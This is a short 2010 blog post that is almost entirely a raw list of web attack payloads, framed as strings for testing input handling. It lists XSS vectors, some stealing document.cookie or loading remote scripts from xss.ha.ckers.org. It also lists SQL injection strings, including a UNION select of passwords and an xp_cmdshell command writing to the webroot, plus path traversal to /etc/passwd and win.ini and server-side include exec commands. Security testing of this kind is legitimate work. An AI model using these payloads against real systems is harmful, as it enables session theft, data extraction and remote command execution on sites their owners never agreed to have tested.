10
11
2010
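xss test
Test strings for checking input handling: mostly XSS, plus a few SQL injection, path traversal and server-side include / command execution probes.
The backslashes before quotes and the doubled backslashes appear to be escaping added when the post was saved, not part of the original strings. Quote escaping of that kind leaves the tags themselves intact, so a page that displays such input still needs HTML output encoding.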
bigCat Posted in NoteBook - Comment.isNotBlank\'><script>alert(document.cookie)</script>
=\'><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(\'XSS\')%3C/script%3E
<script>alert(\'XSS\')</script>
<img src=\"javascript:alert(\'XSS\')\">
%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert(\'Vulnerable\');</script>
<script>alert(\'Vulnerable\')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(\'Vulnerable\')</script>
a/
a?<script>alert(\'Vulnerable\')</script>
\"><script>alert(\'Vulnerable\')</script>
\';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini
\'\';!--\"<XSS>=&{()}
<IMG SRC=\"javascript:alert(\'XSS\');\">
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=JaVaScRiPt:alert(\'XSS\')>
<IMG SRC=JaVaScRiPt:alert(\"XSS\")>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=javascript:alert(\'XSS\')>
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
<IMG SRC=\"jav ascript:alert(\'XSS\');\">
\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out
<IMG SRC=\" javascript:alert(\'XSS\');\">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=\"javascript:alert(\'XSS\')\">
<BODY ONLOAD=alert(\'XSS\')>
<IMG DYNSRC=\"javascript:alert(\'XSS\')\">
<IMG LOWSRC=\"javascript:alert(\'XSS\')\">
<BGSOUND SRC=\"javascript:alert(\'XSS\');\">
<br size=\"&{alert(\'XSS\')}\">
<LAYER SRC=\"http://xss.ha.ckers.org/a.js\"></layer>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert(\'XSS\');\">
<IMG SRC=\'vbscript:msgbox(\"XSS\")\'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(\'XSS\');\">
<IFRAME SRC=javascript:alert(\'XSS\')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert(\'XSS\')></FRAME></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert(\'XSS\')\">
<DIV STYLE=\"background-image: url(javascript:alert(\'XSS\'))\">
<DIV STYLE=\"behaviour: url(\'http://www.how-to-hack.org/exploit.html\');\">
<DIV STYLE=\"width: expression(alert(\'XSS\'));\">
<STYLE>@im\\port\'\\ja\\vasc\\ript:alert(\"XSS\")\';</STYLE>
<IMG STYLE=\'xss:expre\\ssion(alert(\"XSS\"))\'>
<STYLE TYPE=\"text/javascript\">alert(\'XSS\');</STYLE>
<STYLE TYPE=\"text/css\">.XSS{background-image:url(\"javascript:alert(\'XSS\')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(\'XSS\')\")}</STYLE>
<BASE HREF=\"javascript:alert(\'XSS\');//\">
getURL(\"javascript:alert(\'XSS\')\")
a=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert(\'XSS\');\";eval(a+b+c+d);
<XML SRC=\"javascript:alert(\'XSS\');\">
\"> <BODY ONLOAD=\"a();\"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><\"
<SCRIPT SRC=\"http://xss.ha.ckers.org/xss.jpg\"></SCRIPT>
<IMG SRC=\"javascript:alert(\'XSS\')\"
<!--#exec cmd=\"/bin/echo \'<SCRIPT SRC\'\"--><!--#exec cmd=\"/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'\"-->
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
<SCRIPT a=\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT a=\">\" \'\' SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT \"a=\'>\'\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin\'--
\' or 0=0 --
\" or 0=0 --
or 0=0 --
\' or 0=0 #
\" or 0=0 #
or 0=0 #
\' or \'x\'=\'x
\" or \"x\"=\"x
\') or (\'x\'=\'x
\' or 1=1--
\" or 1=1--
or 1=1--
\' or a=a--
\" or \"a\"=\"a
\') or (\'a\'=\'a
\") or (\"a\"=\"a
hi\" or \"a\"=\"a
hi\" or 1=1 --
hi\' or 1=1 --
hi\' or \'a\'=\'a
hi\') or (\'a\'=\'a
hi\") or (\"a\"=\"a
这是神马?